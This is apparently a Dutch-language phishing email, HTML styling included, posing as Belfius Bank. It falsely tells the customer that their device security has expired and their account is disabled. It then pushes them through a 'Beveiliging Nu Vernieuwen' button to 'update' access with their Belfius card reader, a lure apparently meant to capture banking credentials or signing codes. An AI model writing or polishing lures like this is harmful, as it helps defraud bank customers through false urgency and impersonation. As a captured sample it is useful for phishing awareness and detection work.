Er zijn beperkingen op uw account ingesteld. Gelieve uw profiel te updaten.

info
2025-10-4 14:36

Belfius Bank Brief

body {

  font-family: Arial, Helvetica, sans-serif;

  background-color: #f6f6f6;

  margin: 0;

  padding: 0;

  line-height: 1.6;

  color: #333;

}

.container {

  max-width: 600px;

  margin: 40px auto;

  background: #fff;

  padding: 30px;

  border-radius: 6px;

  box-shadow: 0 2px 6px rgba(0,0,0,0.1);

}

.logo {

  text-align: center;

  margin-bottom: 20px;

}

.logo img {

  max-width: 180px;

  height: auto;

}

p {

  margin: 15px 0;

}

.button {

  display: inline-block;

  background-color: #d8005a;

  color: #fff;

  text-decoration: none;

  padding: 12px 20px;

  border-radius: 25px;

  font-weight: bold;

  margin-top: 20px;

}

.button:hover {

  background-color: #a50045;

}

.footer {

  margin-top: 30px;

  font-size: 14px;

  color: #555;

}



  


Beste klant,

In het kader van onze periodieke veiligheidscontroles is vastgesteld dat de beveiliging op uw apparaat (ID: JOD8562) is verlopen. Dit is een standaardprocedure om uw account en gegevens te beveiligen.


Als gevolg hiervan is uw account tijdelijk uitgeschakeld. Hierdoor kunt u geen gebruik maken van onze online diensten, zoals betalingen verrichten, toegang tot uw fondsen verkrijgen of wijzigingen doorvoeren. Om uw toegang tot de bankdiensten te herstellen, dient u uw huidige apparaatrecht bij te werken via uw Belfius-kaartlezer. Na voltooiing van deze update wordt uw account onmiddellijk weer geactiveerd.

Beveiliging Nu Vernieuwen

  Met vriendelijke groeten,Belfius Bank